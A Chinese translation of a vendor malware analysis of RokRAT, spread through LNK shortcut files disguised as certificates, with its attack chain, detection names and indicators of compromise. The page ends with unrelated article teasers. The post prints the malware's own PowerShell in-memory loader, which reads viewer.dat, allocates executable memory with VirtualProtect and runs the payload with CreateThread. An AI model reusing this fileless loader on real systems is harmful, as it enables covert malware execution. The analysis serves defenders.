[译文] 恶意代码分析:2.LNK文件伪装成证书传播RokRAT恶意软件(含无文件攻击)

这是作者新开的一个专栏,主要翻译国外知名安全厂商的技术报告和安全技术,了解它们的前沿技术,学习它们威胁溯源和恶意代码分析的方法,希望对您有所帮助。当然,由于作者英语有限,会借助LLM进行校验和润色,最终结合自己的安全经验完成,还请包涵!

前文介绍了文本编辑器notepad++如何被感染的,通过恶意链接引导用户下载恶意的编辑器,并分析其恶意行为。这篇文章将翻译一篇LNK文件发起的恶意攻击,主要是LNK文件伪装成证书执行RokRAT恶意软件,并利用Powershell命令发起无文件攻击和执行相关行为。基础性技术文章,希望您喜欢!

  • 欢迎关注作者新建的『网络攻防和AI安全之家』知识星球

文章目录

  • 一.前言
  • 二.攻击机理分析
  • 三.恶意软件行为分析及IOCs
  • 四.总结

在这里插入图片描述

  • 原文标题:《LNK File Disguised as Certificate Distributing RokRAT Malware》
  • 原文链接:https://asec.ahnlab.com/en/65076/
  • 文章作者:yeeun [ASEC]
  • 发布时间:2024年5月7日
  • 文章来源:https://asec.ahnlab.com/

前文系列:

  • [译文] LLM安全:1.黑客如何读取您与ChatGPT或微软Copilot的聊天内容
  • [译文] 恶意代码分析:1.您记事本中的内容是什么?受感染的文本编辑器notepad++
  • [译文] 恶意代码分析:2.LNK文件伪装成证书传播RokRAT恶意软件(含无文件攻击)

声明:本人坚决反对利用工具或渗透技术进行犯罪的行为,一切犯罪行为必将受到严惩,绿色网络需要我们共同维护,更推荐大家了解它们背后的原理,更好地进行防护。该系列主要翻译外文博客为主,旨在为大家提供他们的攻防视角。


一.前言

AhnLab安全情报中心(ASEC,AhnLab SEcurity intelligence Center) 已经确认了持续分发异常大小的快捷方式文件(.LNK),这些文件正在传播具有后门的恶意软件。他们发现该种基于快捷方式文件(.LNK)的恶意软件主要针对韩国用户,特别是与朝鲜相关的用户。

已确认的LNK文件名如下:

  • National Information Academy 8th Integrated Course Certificate (Final).lnk
    国家信息学院第八届综合课程证书(最终).lnk
  • Gate access roster 2024.lnk
    2024年门禁准入名单.lnk
  • Northeast Project (US Congressional Research Service (CRS Report).lnk
    东北项目(美国国会研究服务 CRS报告).lnk
  • Facility list.lnk
    设施列表.lnk

下图展示已确认的LNK文件属性。

在这里插入图片描述


二.攻击机理分析

已确认的LNK文件包含一个通过CMD执行的PowerShell命令,并且它们的类型类似于去年发布的文章中发现的类型。

  • RokRAT Malware Distributed Through LNK Files (*.lnk): RedEyes (ScarCruft)
    通过LNK文件(*.lnk)传播的RokRAT恶意软件:RedEyes (ScarCruft)

这种类型的恶意软件有一个显著特点:它在LNK文件中包含了合法的文档文件、脚本代码和恶意PE数据。

  • legitimate document files
  • script code
  • malicious PE data

下图展示了LNK文件中包含的PDF文件和脚本代码。

在这里插入图片描述

在这里插入图片描述

RokRAT恶意软件的简化操作过程如下所示,是一种比较常见的LNK攻击:

  • 通过Email发起鱼叉式钓鱼攻击,包括恶意LNK文件(可执行Powershell)
  • 整个LNK文件包含:正常PDF文件、viwer.dat、search.dat、find.bat
  • 发起RokRAT无文件攻击,利用云端API收集用户信息

更详细的描述如下:

在这里插入图片描述

(1)当LNK文件被执行时,它会运行PowerShell命令来创建并执行一个合法的文档文件。 如下图所示,创建了一个韩文的合法文档,旨在干扰被攻击者。

在这里插入图片描述

(2)随后,它在%public%文件夹中创建了3个文件。 此步骤中所创建文件的名称和特性如下:

文件名LNK文件中的位置特征
viewer.dat0x2BC97 (size:0xD9402)Encoded RokRAT malware(编码RokRAT恶意软件)
search.dat0x105099 (size:0x5AA)Executes viewer.dat file(执行viewer.dat文件)
find.bat0x105643 (size:0x139)Executes search.dat file(执行search.dat文件)

(3)第一个执行项是“find.bat”,它通过PowerShell代码运行“search.dat”。接着,“search.dat”以无文件攻击的方式读取并执行“viewer.dat”文件。

关键代码如下所示:

$exePath=$env:public+'\'+'viewer.dat';
$exeFile = Get-Content -path $exePath -encoding byte;
[Net.ServicePointManager]::SecurityProtocol = [Enum]::ToObject([Net.SecurityProtocolType], 3072);
$k1123 = [System.Text.Encoding]::UTF8.GetString(34) + 'kernel32.dll' + [System.Text.Encoding]::UTF8.GetString(34);
<중략>
$byteCount = $exeFile.Length;
$buffer = $b::GlobalAlloc(0x0040, $byteCount + 0x100);
$old = 0;
$a90234sb::VirtualProtect($buffer, $byteCount + 0x100, 0x40, [ref]$old);
for($i = 0;$i -lt $byteCount;$i++) { [System.Runtime.InteropServices.Marshal]::WriteByte($buffer, $i, $exeFile[$i]);	};
$handle = $cake3sd23::CreateThread(0, 0, $buffer, 0, 0, 0);
$fried3sd23::WaitForSingleObject($handle, 500 * 1000);

(4)最终执行的“viewer.dat”数据即是RokRAT恶意软件,它是一种后门类型的恶意软件,能够利用云API收集用户信息,并根据威胁攻击者的命令下执行各种恶意行为。

  • 收集到的信息通过如pCloud、Yandex和DropBox等云服务传输到威胁攻击者的云服务器中。此时,请求头中的UserAgent伪装成Googlebot,所使用的云URL如下表所示。
  • User-Agent: Mozilla/5.0 (compatible; Googlebot/2.1; +http://www.google.com/bot.html)

在这里插入图片描述


三.恶意软件行为分析及IOCs

该恶意软件根据威胁行为体(behaviors)或攻击者的命令可以执行的恶意行为包括:

  • 执行cmd命令
  • 收集目录信息
  • 删除启动项文件夹中的特定文件(包括VBS、CMD、BAT和LNK扩展名)
  • 收集启动文件夹列表、%APPDATA%文件夹列表以及最近使用的文件列表
  • 收集PC信息(系统信息、IP、路由器信息等)

此外,还可以执行其他的恶意行为,并且收集到的信息在上传至攻击者的云服务器之前,会先存储在%TEMP%文件夹中。在分析过程中所识别出的攻击者的电子邮件地址如下。

  • tanessha.samuel@gmail[.]com
  • tianling0315@gmail[.]com
  • w.sarah0808@gmail[.]com
  • softpower21cs@gmail[.]com

由于此类事件频繁发生,ASEC将通过其官方博客持续分享有关恶意快捷方式文件传播的信息。特别需要注意,近年来不断发现“针对朝鲜半岛统一、军事和教育相关的个人或团体恶意软件”,因此,我们需要格外谨慎。

[File Detection]

  • Dropper/LNK.S2343 (2024.04.12.03)
  • Trojan/BAT.Runner (2024.04.12.00)
  • Trojan/Script.Generic (2024.04.12.00)
  • Data/BIN.EncPe (2024.04.12.00)
  • Infostealer/Win.Agent.R579429 (2023.05.05.01)

[IoC]

  • b85a6b1eb7418aa5da108bc0df824fc0
  • 358122718ba11b3e8bb56340dbe94f51
  • 35441efd293d9c9fb4788a3f0b4f2e6b
  • 68386fa9933b2dc5711dffcee0748115
  • bd07b927bb765ccfc94fadbc912b0226
  • 6e5e5ec38454ecf94e723897a42450ea
  • 3114a3d092e269128f72cfd34812ddc8
  • bd98fe95107ed54df3c809d7925f2d2c

四.总结

写到这里,这篇文章就介绍完毕,基础性文章,希望对您有所帮助。

在这里插入图片描述

2024年4月28日是Eastmount的安全星球——『网络攻防和AI安全之家』正式创建和运营的日子,该星球目前主营业务为 安全零基础答疑、安全技术分享、AI安全技术分享、AI安全论文交流、威胁情报每日推送、网络攻防技术总结、系统安全技术实战、面试求职、安全考研考博、简历修改及润色、学术交流及答疑、人脉触达、认知提升等。下面是星球的新人券,欢迎新老博友和朋友加入,一起分享更多安全知识,比较良心的星球,非常适合初学者和换安全专业的读者学习。

在这里插入图片描述
目前收到了很多博友、朋友和老师的支持和点赞,尤其是一些看了我文章多年的老粉,购买来感谢,真的很感动,类目。未来,我将分享更多高质量文章,更多安全干货,真心帮助到大家。虽然起步晚,但贵在坚持,像十多年如一日的博客分享那样,脚踏实地,只争朝夕。继续加油,再次感谢!

(By:Eastmount 2024-05-14 星期二 夜于贵阳 http://blog.csdn.net/eastmount/ )

本文来自互联网用户投稿,该文观点仅代表作者本人,不代表本站立场。本站仅提供信息存储空间服务,不拥有所有权,不承担相关法律责任。如若转载,请注明出处:http://www.mzph.cn/news/837722.shtml

如若内容造成侵权/违法违规/事实不符,请联系多彩编程网进行投诉反馈email:809451989@qq.com,一经查实,立即删除!

相关文章

Github项目管理——仓库概述(一)

个人名片&#xff1a; &#x1f393;作者简介&#xff1a;嵌入式领域优质创作者&#x1f310;个人主页&#xff1a;妄北y &#x1f4de;个人QQ&#xff1a;2061314755 &#x1f48c;个人邮箱&#xff1a;[mailto:2061314755qq.com] &#x1f4f1;个人微信&#xff1a;Vir2025WB…

28、查看Qt源码

一、方法1 在安装Qt时&#xff0c;需要勾选“Sources” 在Qt的安装目录Qt5.12.10\5.12.10\Src中可以找到Qt的源码 二、方法2 访问如下网址&#xff08;需要翻墙&#xff09; https://codebrowser.dev/ 在搜索框中输入要查找的信息&#xff0c;如&#xff1a;QMainWindow&…

【IDE】com.intellij.debugger.engine.evaluation.EvaluateException

目录标题 报错重现代码分析解决方式 报错重现 Error during generated code invocation com.intellij.debugger.engine.evaluation.EvaluateException: Method threw java.lang.NullPointerException exception.代码分析 //ls来自上下文 ls.stream().map(m->m.getRewardTy…

Windows11系统配置WSL2网络使它支持LAN访问

提示&#xff1a;文章写完后&#xff0c;目录可以自动生成&#xff0c;如何生成可参考右边的帮助文档 文章目录 前言一、WSL2安装二、使用步骤1.NAT2.镜像 三、写在最后总结 前言 WSL2的出现感觉真的是一个惊喜&#xff0c;又想玩Linux&#xff0c;又怕日用搞不了的最佳替代方…

深入理解分布式算法

随着互联网和大数据时代的到来&#xff0c;分布式系统已经成为了当今软件开发领域的主流之一。在分布式系统中&#xff0c;如何高效地协调和管理各个节点之间的数据和计算任务成为了一个重要的问题。分布式算法作为解决这一问题的关键技术之一&#xff0c;扮演着至关重要的角色…

前端 JS 经典:原型和原型链

1. 前言 这个前言很重要&#xff0c;要理解原型、原型链&#xff0c;就需要理解前言里面的一些定义。开始&#xff01; 所有对象都是通过 new 一个函数去创建的&#xff0c;而这个函数通常首字母大写&#xff0c;被称为构造函数。我们也可以通过自定义构造函数&#xff0c;去…

Largest Digit(思维题)

The 2023 ICPC Asia Jinan Regional Contest (The 2nd Universal Cup. Stage 17: Jinan) D. Largest Digit 题意&#xff1a; 设 f ( x ) f(x) f(x) 是正整数 x x x 的十进制表示中的最大位数。例如&#xff0c; f ( 4523 ) 5 f(4523) 5 f(4523)5 和 f ( 1001 ) 1 f(1…

深度学习入门到放弃系列 - 阿里云人工智能平台PAI部署开源大模型chatglm3

通过深度学习入门到放弃系列 - 魔搭社区完成开源大模型部署调用 &#xff0c;大概掌握了开源模型的部署调用&#xff0c;但是魔搭社区有一个弊端&#xff0c;关闭实例后数据基本上就丢了&#xff0c;本地的电脑无法满足大模型的配置&#xff0c;就需要去租用一些高性价比的GPU机…

空格探究 空格ASCII码值不一样

背景 今天修改数据库字段发现修改无效,最后发现是空格引起的,数据库中空格有一些奇怪的空格 获取ASCII码,发现不一样 public static void main(String[] args) {String str1 " ";String str2 " ";System.out.println((int)str1.charAt(0) );//13228Syste…

神经网络中的误差反向传播(Backpropagation)方法理解

想象一下&#xff0c;神经网络就像是一个复杂的迷宫&#xff0c;里面有许多交叉路口&#xff08;神经元&#xff09;&#xff0c;每个路口都有指示牌告诉你往哪个方向走&#xff08;权重&#xff09;&#xff0c;而你的目标是找到从入口到出口的最佳路径&#xff0c;使得从起点…

优选算法——双指针2

题目一——有效三角形的个数 思路 先审题 举个例子&#xff0c;下面一个序列可分成4个三元组 然后我们论证哪个可以组成三角形即可 判断三个数能不能组成三角形&#xff1a;任意两边之和大于第三边 注意第一个和第四个&#xff0c;有人说&#xff0c;这不是两个相同的吗&#…

原生小程序开发如何使用 tailwindcss

原生小程序开发如何使用 tailwindcss 原生小程序开发如何使用 tailwindcss 前言什么是 weapp-tailwindcss ?0. 准备环境以及小程序项目1. 安装与配置 tailwindcss 0. 使用包管理器安装 tailwindcss1. 在项目目录下创建 postcss.config.js 并注册 tailwindcss2. 配置 tailwind…

python中try/except/else/finally块的一些例子

Python中的try/except/else/finally块可以用来捕获和处理异常&#xff0c;确保程序的健壮性。以下是一些使用这些块的例子&#xff1a; ### 基本异常捕获 python try: # 尝试读取文件 with open(example.txt, r) as file: data file.read() except FileNotF…

【强训笔记】day22

NO.1 思路&#xff1a;将情况全部枚举出来。 代码实现&#xff1a; #include <iostream> #include<string> using namespace std;string a,b; int main() {cin>>a>>b;int ma.size(),nb.size();int retm;for(int i0;i<n-m;i){int tmp0;for(int j…

【UnityShader入门精要学习笔记】第十二章 屏幕后处理效果

本系列为作者学习UnityShader入门精要而作的笔记&#xff0c;内容将包括&#xff1a; 书本中句子照抄 个人批注项目源码一堆新手会犯的错误潜在的太监断更&#xff0c;有始无终 我的GitHub仓库 总之适用于同样开始学习Shader的同学们进行有取舍的参考。 文章目录 建立一个基…

如何在Python中加载机器学习数据

如何在Python中加载机器学习数据 在开始机器学习项目之前&#xff0c;您必须能够加载数据。 机器学习数据最常见的格式是CSV文件。在Python中加载CSV文件的方法有很多。 加载CSV数据时的注意事项 1.你的数据有文件头吗&#xff1f;如果是这样的话&#xff0c;这可以帮助自动…

上位机图像处理和嵌入式模块部署(树莓派4b的提高版)

【 声明&#xff1a;版权所有&#xff0c;欢迎转载&#xff0c;请勿用于商业用途。 联系信箱&#xff1a;feixiaoxing 163.com】 目前人工智能非常火&#xff0c;但是人工智能需要极高的算力和海量的数据&#xff0c;因此相关的关联公司非常吃香&#xff0c;nvidia就是提供算力…

【基本数据结构】链表

文章目录 前言链表简介头节点与尾节点特性 分类单向链表双向链表循环链表 单链表基本操作定义并初始化单链表读取节点插入节点删除节点修改节点 参考资料写在最后 前言 本系列专注更新基本数据结构&#xff0c;现有以下文章&#xff1a; 【算法与数据结构】数组. 【算法与数…

互联网搞钱大变天,这有几条活路

互联网搞钱大变天&#xff0c;这有几条活路 靠互联网营生的各位同胞&#xff0c;你们有没有想过这样一个问题&#xff1a;假如有一天你的自媒体账号全被封了&#xff0c;你手上的操作项目全都黄了&#xff0c;你会怎么办&#xff1f; 就封号这事在这几年相信大家都不会陌生&a…

【LLM第五篇】名词解释:prompt

1.是什么 提示工程&#xff08;Prompt Engineering&#xff09;是一门较新的学科&#xff0c;关注提示词开发和优化&#xff0c;帮助用户将大语言模型&#xff08;Large Language Model, LLM&#xff09;用于各场景和研究领域。 掌握了提示工程相关技能将有助于用户更好地了解…